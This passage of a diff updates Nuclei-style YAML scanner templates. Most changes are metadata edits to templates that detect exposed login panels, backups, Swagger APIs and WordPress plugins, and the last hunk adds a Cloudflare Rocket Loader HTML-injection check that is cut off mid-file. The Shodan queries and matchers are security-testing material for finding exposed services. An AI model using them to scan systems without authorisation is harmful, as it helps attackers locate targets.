+    stop-at-first-match: true
+
+    host-redirects: true
+    max-redirects: 2
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Cisco Unity Connection Administration"
+          - ">Cisco Unity Connection</a>"
+        condition: or
+      - type: status
+        status:
+          - 200
+# digest: 490a00463044022022e561912a02fb0baa91f246eebc3a05855972f2bab1224383889c1dfc20e20b02201a6bfd866f1ed3a945fb0c8a615a7b41244c13f0286921c37b72d89b08e95e70:922c64590222798bb761d5b6d8e72950

http/exposed-panels/dockge-panel.yaml

@@ -11,10 +11,9 @@ info:
     - https://dockge.kuma.pet/
   metadata:
     verified: true
-    max-request: 2
+    max-request: 1
-    shodan-query: title:"Dockge"
+    shodan-query: "title:\"Dockge\""
   tags: panel,dockge,login
-
 http:
   - method: GET
     path:
@@ -32,4 +31,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207b4b31e89b41d54ec47a046fbbfcff3b303e68aff67845ca51b890588d9c2f180220712c5d5677eb71010f6ec9f123f1f4a074bc531998dba39a0c8a287a7e5cf40d:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502204b3172c4c1a24716f7a36595e882653be64ea2699acebc7150c9bb87487c4b7302210091e20d9ea7ba962951c9bd8836bb065e490b7c99eda7f2b34b8209c155ebd94b:922c64590222798bb761d5b6d8e72950

http/exposed-panels/easyjob-panel.yaml

@@ -5,12 +5,13 @@ info:
   author: righettod
   severity: info
   description: |
-     EasyJOB login panel was detected.
+    EasyJOB login panel was detected.
   reference:
     - https://www.en.because-software.com/software/easyjob/
   metadata:
     verified: true
-    shodan-query: http.title:"Log in - easyJOB"
+    shodan-query: "http.title:\"Log in - easyJOB\""
+    max-request: 1
   tags: panel,easyjob,login
 
 http:
@@ -31,4 +32,4 @@ http:
         group: 1
         regex:
           - 'easyJOB\s+([0-9.]+)'
-# digest: 4a0a004730450220411982e48718601305b05a93c91be6a680ce993e5e110400b0dabbff753fe0bb02210091af5cbecc2fd766de347dad93c4a3e105a0d3f5a4a8f7a002bdb838c3bc2fad:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100f82e7fbb4c360cb536e24b99b8f65c91e8d46ebbc0f45a156d6074c154e202a402203334ffeaa0ca0e92f85d5ddcfd516f44ec9fbc55655b5351d2e193726e2b2248:922c64590222798bb761d5b6d8e72950

http/exposed-panels/goanywhere-mft-login.yaml

@@ -7,12 +7,11 @@ info:
   description: GoAnywhere Managed File Transfer login panel was detected.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0
     cwe-id: CWE-200
   metadata:
+    shodan-query: "http.html:\"GoAnywhere Managed File Transfer\""
     verified: true
-    max-request: 1
+    max-request: 2
-    shodan-query: http.html:"GoAnywhere Managed File Transfer"
   tags: panel,goanywhere,login,filetransfer
 
 http:
@@ -35,4 +34,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100947f00fcac2bdcc793453ed15706359afde89947675258107183adb0f5b622f7022100e9295654f6ab5e2e2c8f63f28b7e99923b92cca82532de2b9314927aecaf52c6:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502206418902cc87923995e4a87a3036d1a138bae03cb012fde34e44df55ce4504dac022100cac92b3dee719aff4f1d10544579c719236bf9dca63006ef5e0e0741aee209b2:922c64590222798bb761d5b6d8e72950

http/exposed-panels/gotify-panel.yaml

@@ -11,7 +11,8 @@ info:
     vendor: gotify
     product: server
     verified: true
-    shodan-query: http.title:"Gotify"
+    shodan-query: "http.title:\"Gotify\""
+    max-request: 1
   tags: panel,gotify,login,detect
 
 http:
@@ -32,4 +33,4 @@ http:
         group: 1
         regex:
           - '"version":"([0-9.]+)"'
-# digest: 4b0a00483046022100c306600c5a3f75ebdbc6d89aeb4a9042c616f870d869819424686889a568b7880221008c14b6498f5d7f935e09fe01a8f4bda2c761f2692a59202766cb798135336ae9:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402204ed0fc61c5fdaec5869843788c59849c687bfe8b39891df7eab06b029e516749022055341de709d14d202015b389e25139b06ed1398ab952f6a2a39cd2ecf6a343de:922c64590222798bb761d5b6d8e72950

http/exposed-panels/grails-database-admin-console.yaml

@@ -13,9 +13,9 @@ info:
     cvss-score: 5.3
     cwe-id: CWE-200
   metadata:
+    max-request: 2
     vendor: grails
     product: grails
-    max-request: 2
   tags: grails,panel
 
 http:
@@ -34,4 +34,4 @@ http:
         words:
           - "Sorry, remote connections ('webAllowOthers') are disabled on this server"
         negative: true
-# digest: 4a0a0047304502204ea638d90bf728298450d4bf071d113ae80087d4e5001d971617212faf1e375c022100dac85d19d2f65956875f904ce9e025a55c229cae307af3e03fa7708c190b8ef6:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100f7857a61a4ccdef275c890a466396f0aef331e21c33e1ab4e86f6cd2c4f3c4a4022025d9b94b715dc2b8c625ba3a8111008a7f2039dd829d7b2bef2414ba73e51ced:922c64590222798bb761d5b6d8e72950

http/exposed-panels/haivision-gateway-panel.yaml

@@ -9,7 +9,8 @@ info:
     - https://www.haivision.com/
   metadata:
     verified: true
-    shodan-query: http.title:"Haivision Gateway"
+    shodan-query: "http.title:\"Haivision Gateway\""
+    max-request: 1
   tags: panel,haivision,login,detect
 
 http:
@@ -23,4 +24,4 @@ http:
           - 'status_code == 200'
           - 'contains_any(body, "<title>Haivision Gateway", "content=\"Haivision Gateway")'
         condition: and
-# digest: 4b0a0048304602210086238eba9398bb797b00f86ef36db758f4962c0d8247070cf8b2554bdbc4b649022100c49ebd06f35893af713c00909b8f98abbae0f3ab6230d799ad0acf6147196e68:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402200b774f9123ccefe48635e129de64e264ee5b5b5882a63118c8e59935903bd895022057bd039a93248ba6b03b8c1078549b1e74b89f06fef7cc311d719dc909801370:922c64590222798bb761d5b6d8e72950

http/exposed-panels/haivision-media-platform-panel.yaml

@@ -9,9 +9,9 @@ info:
     - https://www.haivision.com/
   metadata:
     verified: true
-    shodan-query: http.title:"Haivision Media Platform"
+    shodan-query: "http.title:\"Haivision Media Platform\""
+    max-request: 1
   tags: panel,haivision,login,detect
-
 http:
   - method: GET
     path:
@@ -23,4 +23,4 @@ http:
           - 'status_code == 200'
           - 'contains_any(body, "<title>Haivision Media Platform", "content=\"Haivision Network Video")'
         condition: and
-# digest: 4a0a00473045022100852a82de658ce3156eed4bb9e4faf88dd4e709f258d2f188cd2aaa6f07d6e85a022079da3770440c2b448ce933600e28d1644f9a9747c3008c9e3b7f2d1f978f9e98:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402205b887d409f93bb8c6bca75ccede4fb4ede2c9c827e9b47af66ef16486efe5bed022013582e7154224d6596931d51c61ce2b4c11d03fc9682a4b29f4731c8cd797b21:922c64590222798bb761d5b6d8e72950

http/exposed-panels/ibm/ibm-dcec-panel.yaml

@@ -10,7 +10,8 @@ info:
     - https://www.ibm.com/docs/en/odm/8.5.1?topic=console-tutorial-getting-started-decision-center-enterprise
   metadata:
     verified: true
-    shodan-query: html:"Decision Center Enterprise console"
+    shodan-query: "html:\"Decision Center Enterprise console\""
+    max-request: 1
   tags: panel,ibm,login,detect,decision-center
 
 http:
@@ -30,4 +31,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c1586e66a4f5b442e8b98fc0197d38db06f862c0aa724aad823686560f8af3150220651109acecc6891e0802e326f21c5261822dbc69bee767c5e4eb04cd73c0026e:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450221008667c30c6129e740f22587180d65bef7ea8c9bc5e42073143338ea019a73840d022004dfe32d460d9554f364fc00d8db42df22960b4dbfde97ec9101a158366ad22e:922c64590222798bb761d5b6d8e72950

http/exposed-panels/ibm/ibm-decision-server-console.yaml

@@ -10,7 +10,8 @@ info:
     - https://www.ibm.com/docs/en/odm/8.12.0?topic=overview-introducing-rule-execution-server
   metadata:
     verified: true
-    shodan-query: title:"Rule Execution Server"
+    shodan-query: "title:\"Rule Execution Server\""
+    max-request: 1
   tags: panel,ibm,login,detect,decision-server
 
 http:
@@ -30,4 +31,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204d00e79a36864310511d3945c877939d641c2eacd7d408a2786aa413851bacd0022100f12605169ab70c9beb895a8691d7cb6f2ca099f3c6bdc7ffe6c2f7b818010135:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100f8a6779c2c863e990a8f3761c1fbc8d9a2aac9c60e69c8feb80a9b48a5660cf102207f75f60642c2257b39595c992440af15edf913738771b226230ebd0d27350410:922c64590222798bb761d5b6d8e72950

http/exposed-panels/ibm/ibm-odm-panel.yaml

@@ -10,7 +10,8 @@ info:
     - https://www.ibm.com/docs/en/odm/8.12.0
   metadata:
     verified: true
-    fofa-query: title="Decision Center | Business Console"
+    fofa-query: "title=\"Decision Center | Business Console\""
+    max-request: 1
   tags: panel,ibm,login,detect,decision-center
 
 http:
@@ -28,4 +29,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d52dbff62d09aa1893a69601b6ebddcee476872b7bb74d935c4e313e8d76578e0220590a89cfb7fc87044c7c7dd5e7def60b1c02374a7671d2affc6a164a3045e4a8:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100b3e217aca2f0e7f4749d018a3aa54ce7d31b691b0feace4be2ea8945691b24a002210092adc4f4e4095474a2915ebe62b11db7981f79fe08a1ce086adc6ddfd2c7811a:922c64590222798bb761d5b6d8e72950

http/exposed-panels/ivanti-connect-secure-panel.yaml

@@ -10,10 +10,10 @@ info:
     - https://www.ivanti.com/products/connect-secure-vpn
   metadata:
     vendor: ivanti
-    product: connect_secure
+    product: "connect_secure"
     verified: true
-    max-request: 1
+    max-request: 2
-    shodan-query: title:"Ivanti Connect Secure"
+    shodan-query: "title:\"Ivanti Connect Secure\""
   tags: panel,connectsecure,login
 
 http:
@@ -35,4 +35,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d585f9e252400d8b89e35a904465bc72b1832386ab12f0554abcefd5a8be293e02202a923fe7c0fc9e7ee34ae5f72b28a5683ab136b9a664779fc942b61847b84a52:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100c4feca263103f90d4e4077e98702f3dd3dbf5c455ecfb5ed45115b96ad11372c022100ba71de0184707063914de8dee85d4e4930735f2609448a0470e38c0198003b7a:922c64590222798bb761d5b6d8e72950

http/exposed-panels/juniper-panel.yaml

@@ -10,12 +10,11 @@ info:
     - https://www.juniper.net/documentation/us/en/software/jweb-ex/jweb-ex-application-package/topics/concept/ex-series-j-web-interface-overview.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
+    max-request: 1
     verified: true
-    shodan-query: http.title:"Juniper Web Device Manager"
+    shodan-query: "http.title:\"Juniper Web Device Manager\""
   tags: panel,juniper,vpn,login
 
 http:
@@ -43,4 +42,4 @@ http:
         group: 1
         regex:
           - 'var modelphpStr = "(.*?)";'
-# digest: 4b0a00483046022100fc6761f1e20dc648ed664ad95d12ebbf947321c37644528bc30edc2a7bc4918d0221009f32657ac7c105b55a5dbe72bb6f2d59f11c4f73563b60a96c5153f99d25b636:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502205ca23f303d8fa1ef26270300c55737695329a18b419a0eaa9c633ec3d476a6b902210089ea66b95ddb52fa15accc8bebc0824d44dc509c97674017cf72d1a0ba8c0997:922c64590222798bb761d5b6d8e72950

http/exposed-panels/kafka-topics-ui.yaml

@@ -10,13 +10,12 @@ info:
     - https://github.com/provectus/kafka-ui
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0
     cwe-id: CWE-200
   metadata:
     vendor: provectus
     product: ui
     platform: kafka
-    max-request: 1
+    max-request: 2
   tags: panel,kafka,apache,detect
 
 http:
@@ -45,4 +44,4 @@ http:
         group: 1
         regex:
           - '"v([0-9.]+)"'
-# digest: 490a004630440220120fd70d830d5673b6694bc74d5d5cdd0f17420aba4ae2000532dbcb795c6584022001816294148c66bde9fe384d304fd6f1b4bbedafc160454c3f9e0b5183f4e601:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502210091554843ef5d12adad3dd9e9d9ba5b82adc7a34ba448aaf4e12449bad284693e022034ed2d535005bac5972abee730948bb14439734f919d1b516f886b50ff402038:922c64590222798bb761d5b6d8e72950

http/exposed-panels/keycloak-admin-panel.yaml

@@ -37,9 +37,10 @@ http:
           - "alt=\"Keycloak"
           - "kc-form-buttons"
           - "/keycloak/img/favicon.ico"
+          - "/admin/keycloak/"
         condition: or
 
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ce99a9168d9735401c84081a0b8c389cebe54d781b5616f4d42390b7b920373a02206394e01504f7c25820d9154260d135c341af22fd6e392b37412ecbd99b9403bd:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100dd6221af8f8b9f571a28611b54d652f7568da86dce1654fa1a73962e720bf2cf022100ed7bd96937ba0a702f5889f0827638671d3ffbd3e98bba852bd274542e59ae0f:922c64590222798bb761d5b6d8e72950

http/exposed-panels/kopano-webapp-panel.yaml

@@ -9,7 +9,8 @@ info:
     - https://kopano.com/
   metadata:
     verified: true
-    shodan-query: http.title:"Kopano WebApp"
+    shodan-query: "http.title:\"Kopano WebApp\""
+    max-request: 1
   tags: panel,kopano,login,detect
 
 http:
@@ -33,4 +34,4 @@ http:
         group: 1
         regex:
           - '\?kv([0-9.]+)"'
-# digest: 4a0a0047304502205ae240e238fffb87a0154ac0e19299328e5fd7f4e02f7cd8b5e0c74e304c8166022100ec2e323a3aa419e061a0504a4864efde49aa02f6272eb5b8c511960367a042e1:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220499c97ef6976f50be4391e8eeb0ddfeb3fcbe37bec5a7fe24d71c473e6b3d673022070949daf15a245428269d09199e9f2377b400261229944d98137f800b4e0f3a8:922c64590222798bb761d5b6d8e72950

http/exposed-panels/linshare-panel.yaml

@@ -10,7 +10,8 @@ info:
     - https://github.com/linagora/linshare
   metadata:
     verified: true
-    shodan-query: http.title:"LinShare"
+    shodan-query: "http.title:\"LinShare\""
+    max-request: 3
   tags: panel,linshare,login,detect
 
 http:
@@ -30,4 +31,4 @@ http:
           - 'status_code == 200'
           - 'contains_any(body, "<title>LinShare", "x-ng-app=\"linshareAdminApp")'
         condition: and
-# digest: 4a0a0047304502207dcbdcd3215abf97fd2c12ef382bf488ddfa0f31ff0f717491fd3b0bf6bd9368022100b838aab3468abf4fe5755bfdb54b4a238263bda36c0ea794d661efa2b18880f8:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100ca5993c797cf75bbaa9653d71b58a8c69d527adaceac8589f0e96b9e49c8d38f02207eac6b0a379abc14b4907532c15a5ad9f9f62ef6b0852286904753a93af8019c:922c64590222798bb761d5b6d8e72950

http/exposed-panels/odoo-panel.yaml

@@ -2,20 +2,25 @@ id: odoo-panel
 
 info:
   name: Odoo - Panel Detect
-  author: DhiyaneshDK
+  author: DhiyaneshDK,righettod
   severity: info
   metadata:
     vendor: odoo
     product: odoo
     verified: true
-    max-request: 1
+    max-request: 2
-    shodan-query: title:"Odoo"
+    shodan-query: "title:\"Odoo\""
   tags: login,panel,odoo
 
 http:
   - method: GET
     path:
       - "{{BaseURL}}/web/login"
+      - "{{BaseURL}}"
+
+    stop-at-first-match: true
+    host-redirects: true
+    max-redirects: 2
 
     matchers-condition: and
     matchers:
@@ -23,8 +28,14 @@ http:
         part: body
         words:
           - '<title>Odoo</title>'
+          - 'odoo.session_info'
+          - 'web.layout.odooscript'
+        condition: or
+
+      - type: word
+        part: body
+        words:
           - 'Log in'
-        condition: and
 
       - type: word
         part: header
@@ -34,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a4ee6283d4c0264ea8d9ac9e56e2c948d50afbb650ac84735d4978ada4bfcdf802207a1bf2401f730d11a14cc03bea4d3e2ac98aae9ad05856f7a41359be3b31eda1:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502202c94e6e7ce327a1d5e088428410c9e0bb977cfd163434b7a8e449af58b032a9c0221009dbebd38cac6453fb54b396854eae6bcef87f5f70980bf2b82610cfb98fdcb54:922c64590222798bb761d5b6d8e72950

http/exposed-panels/passbolt-panel.yaml

@@ -5,14 +5,14 @@ info:
   author: righettod
   severity: info
   description: |
-     Passbolt login panel was detected.
+    Passbolt login panel was detected.
   reference:
     - https://www.passbolt.com/
   metadata:
     verified: true
-    shodan-query: http.title:"Passbolt | Open source password manager for teams"
+    shodan-query: "http.title:\"Passbolt | Open source password manager for teams\""
+    max-request: 1
   tags: panel,passbolt,login
-
 http:
   - method: GET
     path:
@@ -31,4 +31,4 @@ http:
         group: 1
         regex:
           - '(?i)v=([0-9a-z.-]+)'
-# digest: 4b0a00483046022100cd46bf88248b5f3ddfbaf30d8f17602a0168b6080418f686067b8482f9b37b570221008b497e1c5529c20f6202974940db3d83ca0be3737bab1799bd727c314e17a142:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402207f1b9037354038919a4460781c2f126b5ca46c7d67c0af2aa6f9653d51573ce2022048ad39d72b06d3603428ca396cf315280273241fbf01fe026e55d2d9f9a4f964:922c64590222798bb761d5b6d8e72950

http/exposed-panels/phpmyadmin-panel.yaml

@@ -7,13 +7,12 @@ info:
   description: phpMyAdmin panel was detected.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0
     cwe-id: CWE-200
   metadata:
+    shodan-query: "http.title:phpMyAdmin"
     vendor: phpmyadmin
     product: phpmyadmin
-    max-request: 12
+    max-request: 13
-    shodan-query: http.title:phpMyAdmin
   tags: panel,phpmyadmin
 
 http:
@@ -46,4 +45,4 @@ http:
         group: 1
         regex:
           - 'v=([a-z0-9-._]+)'
-# digest: 490a0046304402203073d075e05bc85ce417b3db20f3c9b6c7a32c22768f7ad39c75ffa91712bb4d022006c2a3c1552f7209c345f11c66087db13eef087aff98dead27a5c4a6f0fa4f54:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402205a7d1860670db2b7c7fe2c51ee5bca11729bf56ee88e3194b9f7cb90959a3ad10220664c394c6cca2ebeceb2166bc8a9d4c78b949ac13ebd420bc441fc7a22adc6af:922c64590222798bb761d5b6d8e72950

http/exposed-panels/proofpoint-protection-server-panel.yaml

@@ -7,14 +7,13 @@ info:
   description: Proofpoint Protection Server panel was detected.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0
     cwe-id: CWE-200
   metadata:
+    product: "proofpoint protection server"
+    shodan-query: "http.favicon.hash:942678640"
     verified: true
-    max-request: 1
+    max-request: 2
     vendor: proofpoint
-    product: proofpoint protection server
-    shodan-query: http.favicon.hash:942678640
   tags: panel,proofpoint,login,detect
 
 http:
@@ -41,4 +40,4 @@ http:
         part: header
         words:
           - 'PPSAUTH='
-# digest: 4a0a00473045022100da651ce3e96c872c09b0efeb7f24ce435691efb6047687fa2f980969c7d32add02206cedee1a6d93fb48ac0d8c6a50883823566a3fdc0b0946e3a3d17921b76ed292:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100a1b58b379feb7b3d65301bdfd4395652cad8294c5edae415ecc4d47669e3ad1a02207e32ff2739b36c0e05a467df6fbef59f1ef6c6383b4ec9a75dbc21729f14efae:922c64590222798bb761d5b6d8e72950

http/exposed-panels/pulse-secure-version.yaml

@@ -5,9 +5,9 @@ info:
   author: dadevel
   severity: info
   metadata:
+    max-request: 2
     vendor: pulsesecure
     product: pulse_connect_secure
-    max-request: 2
   tags: pulse,panel
 
 http:
@@ -40,4 +40,4 @@ http:
         part: body
         regex:
           - "(?i)<string>([^<]+)</string>"
-# digest: 4a0a0047304502203aa1cb77ba86704bad2c198c7fbf07c028f96dfe80cb8d6860fbec949ba9b314022100dbe4fbc3fd5b5fb9a25b9f45063a4c986bbe786b109f9356b2da46be1eb8b4af:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100f823e5c127aced792ff96e8e9214476b414af4e1353f299d1e59d51b537e6fd3022100b1c6a628c41e09ad48d649a5dca0b9f6051955009d9de2338a4237d51322544b:922c64590222798bb761d5b6d8e72950

http/exposed-panels/rocketchat-panel.yaml

@@ -9,7 +9,8 @@ info:
     - https://www.rocket.chat/
   metadata:
     verified: true
-    shodan-query: http.title:"Rocket.Chat"
+    shodan-query: "http.title:\"Rocket.Chat\""
+    max-request: 1
   tags: panel,rocketchat,login,detect
 
 http:
@@ -25,4 +26,4 @@ http:
           - 'status_code == 200'
           - 'contains_any(body, "<title>Rocket.Chat", "content=\"Rocket.Chat")'
         condition: and
-# digest: 490a00463044022012e5cbbf245707dd32c566958b4c6fa7a07f06f418139ec7a81026c1f90de09a0220096635ca065674713ac77f3b305157cbfba0635b3f6e7d7da94cf8ed3f1ac1e7:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220213f92e33c7b93bd760a281dff3427b796dcb4eed73ed550941fb16abddd89180220080a30ead625b8491cb47333aff0f5d45158897773064a2aeb1baddffe94683a:922c64590222798bb761d5b6d8e72950

http/exposed-panels/sentry-panel.yaml

@@ -5,14 +5,15 @@ info:
   author: righettod
   severity: info
   description: |
-     Sentry login panel was detected.
+    Sentry login panel was detected.
   reference:
     - https://sentry.io/
   metadata:
     vendor: sentry
     product: sentry
     verified: true
-    shodan-query: http.title:"Login | Sentry"
+    shodan-query: "http.title:\"Login | Sentry\""
+    max-request: 1
   tags: panel,sentry,login
 
 http:
@@ -36,4 +37,4 @@ http:
         group: 1
         regex:
           - '(?i)"current":\s*"([0-9a-z.-]+)"'
-# digest: 4b0a00483046022100bc11bbc2da0eeaaeb02cfdf576e886aaad2dbc0fbf346c43f5d8242aafd24ac102210087c344fb3a27ea65932c1a1adbd8ede83fcc91914d7c39027ae096ec8cd72ac0:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100b04d058d31690931f321b078a2ac12a98dbfae03861caadbc878766143783e2902207291a26d57c10aaa7dfedba3b543e898aa150509733c646e144fcd58a5758175:922c64590222798bb761d5b6d8e72950

http/exposed-panels/truenas-scale-panel.yaml

@@ -9,10 +9,10 @@ info:
   reference:
     - https://www.truenas.com
   metadata:
-    vendor: ixsystems
-    product: truenas
     verified: true
     max-request: 1
+    vendor: ixsystems
+    product: truenas
     shodan-query: html:"TrueNAS"
   tags: login,panel,truenas
 
@@ -33,4 +33,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100dd1d5fd20c54a80d0f7d2631323b4434a2da43d683ca143da2f976cf8ab372d702201c583fae3cb0276990d9ad033e8461d795c1c7eba84d733b30cb0b2a45e60d26:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100ece185971ecd556127979d86bf7200c50f67dfaf61bb545570d1df063fd788a2022100ddaefbef6ccd73cfd9d33ba6612bfab01cd89d1c688769cc5159cfee1588d464:922c64590222798bb761d5b6d8e72950

http/exposed-panels/vistaweb-panel.yaml

@@ -5,11 +5,12 @@ info:
   author: righettod
   severity: info
   description: |
-     Vista Web login panel was detected.
+    Vista Web login panel was detected.
   reference:
     - https://resa.aero/solutions-operations-facturation/vista-web/
   metadata:
     verified: true
+    max-request: 1
   tags: panel,vistaweb,login
 
 http:
@@ -30,4 +31,4 @@ http:
         group: 1
         regex:
           - 'v=([0-9.]+)'
-# digest: 4b0a004830460221009afbf2bd9a3f5bfffe7e6d92b5b3f4423102532bd1114541c5258759f24bc380022100e1677ad6b53c0e42ddb24ee59efd95a0682281006b56d46e0fb15a195598ffda:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e75b80b7677ce3d46ea55b865e0c89ab12384a99ff0b565ec6e4dd49f1090a3102207c7e6629206f24058e677de683d5e3a191e9b14095a37db1469d6bfe1d00ac7b:922c64590222798bb761d5b6d8e72950

http/exposures/apis/swagger-api.yaml

@@ -10,9 +10,9 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
     cwe-id: CWE-200
   metadata:
+    max-request: 59
+    shodan-query: "http.title:\"swagger\""
     verified: true
-    max-request: 57
-    shodan-query: http.title:"swagger"
   tags: exposure,api,swagger
 
 http:
@@ -105,4 +105,4 @@ http:
         group: 1
         regex:
           - " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"
-# digest: 4a0a00473045022100d3639a8b44e797aa3fc7cca0bb5778f14f0d9d59ab15483940be419fa21321fa02204cbbcd636969871ac6d8cea4cb7aada40b6938b1f3314f3c235d4a80a1550bbd:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220699b1c75442a856dcd0637850a4464835dd00335e1ec2f4345bebd359e25f9af022100e79a9981d9c1330730d4f4b9fe6a2785c38be6e2ee9ad19f1df3d38694a5f97d:922c64590222798bb761d5b6d8e72950

http/exposures/backups/zip-backup-files.yaml

@@ -10,7 +10,7 @@ info:
     cvss-score: 5.3
     cwe-id: CWE-200
   metadata:
-    max-request: 1440
+    max-request: 1305
   tags: exposure,backup
 
 http:
@@ -127,4 +127,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009e9e29e2bc6fa477a5ef35e682ed0677d6cd6457e0516add7ba7b3657dea242c0220573cc11dd5d3c17b8bb3226a23ac6bfa501b1c7f5e337c1fdfe79e581abadeb9:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100a51f2952c9c24769da7d9ad5fa3f8ad2c01a800385052b494e5cf8b8cd2b0b2002210086e92de1a4bcde1fb7758917220ed3470e42201e239106f349d60c0e28d6452b:922c64590222798bb761d5b6d8e72950

http/exposures/configs/awstats-script.yaml

@@ -8,10 +8,9 @@ info:
   reference: https://www.awstats.org/docs/awstats_setup.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0
     cwe-id: CWE-200
   metadata:
-    max-request: 3
+    max-request: 4
   tags: config,exposure,awstats
 
 http:
@@ -36,4 +35,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a1d5304bdbe5718f9bb640888a5db388a5558f54e61dd1b5154393c62febb940022100a7d26343bf553aacbf42a7d583dc4bb2d4222a7fe0d08eae43078c91e82029f2:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220627e9e39ded451b53e2044aebb66514409fa81010ab0676b9ac36403755c30110221009aeb142c34946a6588ea2a98ebfece9603c77169ee688104cc8e6408be7b3c0d:922c64590222798bb761d5b6d8e72950

http/exposures/logs/roundcube-log-disclosure.yaml

@@ -8,7 +8,7 @@ info:
   reference:
     - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/roundcube-log-disclosure.json
   metadata:
-    max-request: 12
+    max-request: 16
   tags: exposure,logs
 
 http:
@@ -57,4 +57,4 @@ http:
       - type: dsl
         dsl:
           - content_length
-# digest: 4a0a0047304502210092febbf3f9906523788e68550f93dd10480ff15eb53ab20a8c452c482c7cd380022061f77b2b8a8ae9439fe60c5d02731b99246b700d7d38cac9608bced9885ba4a3:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100f29f0edc0fd1c21ddc672864cdd1b0e8f9b6bf2fd245e63e3a18e009f87dda4802210094fc7c7162920f3d1b9a810729c4ac860b27bb6b73a4fe837009758cf4ee4fae:922c64590222798bb761d5b6d8e72950

http/fuzzing/wordpress-plugins-detect.yaml

@@ -5,7 +5,7 @@ info:
   author: 0xcrypto
   severity: info
   metadata:
-    max-request: 98135
+    max-request: 100563
   tags: fuzzing,bruteforce,wordpress
 
 http:
@@ -35,4 +35,4 @@ http:
         regex:
           - "===\\s(.*)\\s===" # extract the plugin name
           - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version
-# digest: 4b0a00483046022100bc606e0746f263229a02d000cd84aafb581fcdf5d93f151e4de17e328f47291b022100a600a40ce1fbd7cab94ccc994cd355edf9dc15ed337d21d28b414705b5324161:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022011ffc9134eaa01b62eddcdbbc33af59e33613478dd206665d9f12d60ea4fe114022100a6845b777b51f0d3959d009a91f612b73b13c9a5dc6fe6d058bd37994d64fe6a:922c64590222798bb761d5b6d8e72950

http/misconfiguration/cloudflare-rocketloader-htmli.yaml

@@ -0,0 +1,40 @@
+id: cloudflare-rocketloader-htmli
+
+info:
+  name: Cloudflare Rocket Loader - HTML Injection
+  author: j3ssie
+  severity: low
+  description: |
+    The Rocket Loader feature in Cloudflare allow attackers to inject arbitrary HTML into the website. This can be used to perform various attacks such as phishing, defacement, etc.
+  reference:
+    - https://developers.cloudflare.com/speed/optimization/content/rocket-loader/enable/
+  metadata:
+    max-request: 1
+    verified: true
+  tags: misconfig,cloudflare,htmli
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cdn-cgi/image/width=1000,format=auto/https://raw.githubusercontent.com/simple-icons/simple-icons/develop/icons/cloudflare.svg"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Cloudflare'
+          - '<svg'
+          - 'M16.5088 16.8447c.1475-.5068.0908-.9707-.1553-1.3154-.2246-.3164-.6045-.499-1.0615-.5205l-'
+          - '1475.5068-.0918.9707.1543 1.3164.2256.3164.6055.498'
